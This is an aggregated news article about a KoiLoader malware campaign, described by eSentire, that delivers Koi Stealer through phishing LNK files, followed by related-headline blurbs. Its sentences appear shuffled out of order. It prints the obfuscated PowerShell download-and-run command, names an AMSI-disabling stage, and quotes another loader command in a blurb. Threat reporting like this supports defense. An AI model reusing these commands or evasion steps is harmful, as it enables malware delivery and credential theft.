New KoiLoader Abuses Powershell Scripts to Deliver Malicious Payload - Cyber Security News

This updated strain employs PowerShell scripts embedded within Windows shortcut (LNK) files to bypass traditional detection mechanisms, demonstrating a concerning evolution in attack methodologies. eSentire’s Threat Response Unit (TRU) first detected the intrusion during routine threat-hunting operations, observing the malware’s multi-stage deployment chain designed to evade endpoint detection and response (EDR) tools. The attack begins with a PowerShell command embedded in the LNK file, which downloads two JScript payloads (g1siy9wuiiyxnk.js and i7z1x5npc.js) to establish persistence and execute further malicious activities. The secondary script (i7z1x5npc.js) retrieves the victim’s machine GUID from the registry (HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid), generates a unique filename, and fetches two PowerShell scripts: one to disable AMSI (boomier10qD0.php) and another (nephralgiaMsy.ps1) to load KoiLoader into memory (Figure 5). Cybersecurity researchers identified a sophisticated malware campaign leveraging a new variant of KoiLoader, a modular payload delivery system notorious for distributing information stealers like Koi Stealer. eSentire analysts noted this technique disrupts process ancestry-based detection, as security tools typically associate wscript.exe with user-initiated actions rather than system services. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. The malware’s impact extends beyond initial compromise, as KoiLoader facilitates the delivery of Koi Stealer, a C#-based information stealer capable of harvesting credentials, cryptocurrency wallets, and sensitive documents. The first JScript (g1siy9wuiiyxnk.js) deletes the initial scheduled task and relaunches the payload via wscript.exe under svchost.exe to simulate benign activity. The campaign’s initial access vector involves phishing emails impersonating financial institutions, luring victims with ZIP archives containing malicious LNK files labeled as bank statements. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $pdw = $env:programdata + '\' + ('g1siy9wuiiyxnk.js i7z1x5npc'); $getf='Dow'+'nl'+'oadF'+'ile'; $w2al9zb7lb86ccs0 = New-Object Net.WebClient; $wscs = 'wscript '; $w2al9zb7lb86ccs0.$getf(' ;.]it/.../hemigastrectomySDur.php', 'g1siy9wuiiyxnk.js'); . With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. Subsequent command-and-control (C2) communications use encrypted HTTP POST requests to exfiltrate victim data, including operating system details, usernames, and domain information. Notably, the threat actors employed scheduled tasks to maintain execution continuity while altering process parentage to mimic legitimate system activity. Organizations are advised to disable wscript.exe via AppLocker, monitor PowerShell execution logs, and deploy behavior-based EDR solutions to mitigate such threats. These files exploit a known Windows vulnerability (ZDI-CAN-25373) to hide command-line arguments, masking their malicious intent during superficial inspection. The infection chain begins when a victim interacts with the LNK file chase_statement_march.lnk, which triggers a truncated PowerShell command. This multi-stage approach highlights adversaries’ increasing sophistication in blending LOLBin abuse, script obfuscation, and encryption to evade detection. Tushar is a Cyber security content editor with a passion for creating captivating and informative content. This campaign shows the growing reliance on living-off-the-land binaries (LOLBins) and script-based attacks to circumvent security controls.

This Cyber News was published on cybersecuritynews.com. Publication date: Wed, 02 Apr 2025 05:15:05 +0000


Cyber News related to New KoiLoader Abuses Powershell Scripts to Deliver Malicious Payload - Cyber Security News

New KoiLoader Abuses Powershell Scripts to Deliver Malicious Payload - Cyber Security News - This updated strain employs PowerShell scripts embedded within Windows shortcut (LNK) files to bypass traditional detection mechanisms, demonstrating a concerning evolution in attack methodologies. eSentire’s Threat Response Unit (TRU) first ...
1 month ago Cybersecuritynews.com
Operation RusticWeb Using PowerShell Commands to filtrate Doc - Hackers use PowerShell commands because they provide a powerful scripting environment on Windows systems, allowing them to stealthily execute malicious scripts and commands called Operation RusticWeb. The PowerShell's capabilities make it an ...
1 year ago Gbhackers.com
Fake Captcha Malware Attacking Windows Users To execute PowerShell Commands - A sophisticated malware campaign is targeting Windows users through deceptive CAPTCHA verification prompts that trick victims into executing malicious PowerShell scripts. Security experts recommend implementing robust security awareness training and ...
2 months ago Cybersecuritynews.com
LummaStealer’s FakeCAPTCHA Steals Browser Credentials Via Weaponized Microsoft Word Files - Cyber Security News - This deceptive chain utilizes the Net.WebClient PowerShell function to pull remote payloads while hiding execution through parameters like “-hidden” and “bypass” to create concealed PowerShell windows. Security professionals ...
4 weeks ago Cybersecuritynews.com CVE-2023-44221
LummaStealer Abuses Windows Utility to Execute Remote Code Mimic as .mp4 File - Cybereason security researchers identified a new and concerning infection vector where LummaStealer abuses the legitimate mshta.exe Windows utility to execute remote hosted code that masquerades as an .mp4 multimedia file. The initial JavaScript ...
1 month ago Cybersecuritynews.com
The Rise of Cyber Insurance - What CISOs Need to Consider - Cyber insurance offers not just financial protection against potentially devastating cyber incidents but also provides frameworks for improving security posture, access to specialized resources, and support during crisis scenarios. Beyond financial ...
1 month ago Cybersecuritynews.com
BianLian GOs for PowerShell After TeamCity Exploitation - In conjunction with GuidePoint's DFIR team, we responded to an incident that began with the exploitation of a TeamCity server which resulted in the deployment of a PowerShell implementation of BianLian's GO backdoor. The threat actor identified a ...
1 year ago Securityboulevard.com CVE-2024-27198 CVE-2023-42793 BianLian
Chihuahua Stealer Leverages Google Drive Document to Steal Browser Login Credentials - A newly discovered .NET-based infostealer dubbed “Chihuahua Stealer” has emerged as a significant threat, exploiting Google Drive documents to deliver malicious PowerShell scripts and steal sensitive data. Organizations are advised to ...
2 weeks ago Cybersecuritynews.com
Hackers Actively Exploiting PowerShell to Evade Antivirus & EDR - Cyber Security News - The visualization reveals how legitimate Windows processes are hijacked to execute malicious code, creating a complex chain that makes attribution and detection challenging for security teams. Cybersecurity experts have identified a concerning trend ...
2 weeks ago Cybersecuritynews.com
New StealC V2 Expands to Include Microsoft Software Installer Packages and PowerShell Scripts - The malware also features a redesigned control panel with an integrated builder, allowing threat actors to customize payload delivery rules based on various factors including geolocation, hardware IDs (HWID), and installed software. The researchers ...
4 weeks ago Cybersecuritynews.com
Uncertainty Is the Biggest Challenge to Australia's Cyber Security Strategy - Political shifts could lead to changes in Australia's cyber security strategy. Early in 2023, as the Australian government started to craft its cyber security vision, it met with opposition at both ends of the political spectrum. On the right wing, ...
1 year ago Techrepublic.com
Malicious JScript Loader Jailbreaked to Uncover Xworm Payload Execution Flow - This analysis highlights the evolution of modern malware distribution techniques, blending sophisticated obfuscation with targeted delivery mechanisms to maximize infection success while minimizing detection. This loader operates through a ...
1 month ago Cybersecuritynews.com
Three Key Threats Fueling the Future of Cyber Attacks - Improvements in cyber security and business continuity are helping to combat encryption-based ransomware attacks, yet the cyber threat landscape is continually evolving. Protecting an organization against intrusion remains a cat and mouse game, in ...
1 year ago Cyberdefensemagazine.com
Agent Tesla Malware Employs Multi-Stage Attacks Using PowerShell Scripts - Security researchers have identified a sophisticated malware campaign utilizing Agent Tesla variants delivered through elaborate multi-stage attack sequences. Broadcom researchers noted that these Agent Tesla variants employ particularly ...
1 month ago Cybersecuritynews.com
TA406 Hackers Attacking to Attack Government Entities to Steal Login Credentials - A Democratic People’s Republic of Korea (DPRK)-linked threat actor tracked as TA406 has intensified cyber espionage efforts against Ukrainian government entities since February 2025, deploying sophisticated phishing campaigns aimed at stealing ...
2 weeks ago Cybersecuritynews.com
Fighting ransomware: A guide to getting the right cybersecurity insurance - While the cybersecurity risk insurance market has been around for more than 20 years, the rapidly changing nature of attacks and the rise in the ransomware epidemic has markedly changed the nature of cyber insurance in recent years. It's more ...
1 year ago Scmagazine.com
Shuckworm Group Uses PowerShell Based GammaSteel Malware in Targeted Attacks - This latest campaign, observed from February through March 2025, represents an evolution in the group’s tactics with a shift toward more sophisticated PowerShell-based malware tools that enhance stealth and persistence capabilities. This ...
1 month ago Cybersecuritynews.com
North Korean Hackers Using Dropbox & PowerShell Scripts To Infiltrate Organizations - Dubbed ‘DEEP#DRIVE’ by researchers at Securonix, the operation leverages phishing lures, obfuscated PowerShell scripts, and Dropbox’s infrastructure to bypass security defenses and exfiltrate sensitive data. A coordinated cyber ...
3 months ago Cybersecuritynews.com Kimsuky
EncryptHub A Multi-Stage Malware Compromised 600 Organizations - The multi-stage attack begins with the execution of a PowerShell command that downloads the first-stage payload: “powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command “Invoke-RestMethod -Uri ...
2 months ago Cybersecuritynews.com
Cyber Insurance for Businesses: Navigating Coverage - To mitigate these risks, many businesses opt for cyber insurance. With the wide range of policies available, navigating the world of cyber insurance can be overwhelming. In this article, we will delve into the complexities of cyber insurance and ...
1 year ago Securityzap.com
Cyber Insurance: A Smart Investment to Protect Your Business from Cyber Threats in 2023 - Don't wait until it's too late - get cyber insurance today and secure your business for tomorrow. According to the U.S. Federal Trade Commission, cyber insurance is a particular type of insurance that helps businesses mitigate financial losses ...
1 year ago Cyberdefensemagazine.com
What CIRCIA Means for Critical Infrastructure Providers and How Breach and Attack Simulation Can Help - Cyber Defense Magazine - To prepare themselves for future attacks, organizations can utilize BAS to simulate real-world attacks against their security ecosystem, recreating attack scenarios specific to their critical infrastructure sector and function within that sector, ...
7 months ago Cyberdefensemagazine.com Akira
New York's cyber chief on keeping cities and states safe from cyberattacks | The Record from Recorded Future News - And so we think that that'll continue to evolve the security posture of New York State in a way that first and foremost provides the public good, which is, if a government service is not secure, it can't be considered reliable. We're ...
2 months ago Therecord.media
Cyber Insights 2023: Cyberinsurance - The result is more than a dozen features on subjects ranging from AI, quantum encryption, and attack surface management to venture capital, regulations, and criminal gangs. In 2022, Russia invaded Ukraine with the potential for more serious and more ...
2 years ago Securityweek.com
IT Professionals in ASEAN Confronting Rising Cyber Security Risks - The ASEAN region is seeing more cyber attacks as digitisation advances. In July 2023, the Association of Southeast Asian Nations officially opened a joint cyber security information sharing and research centre, or Cybersecurity and Information Centre ...
1 year ago Techrepublic.com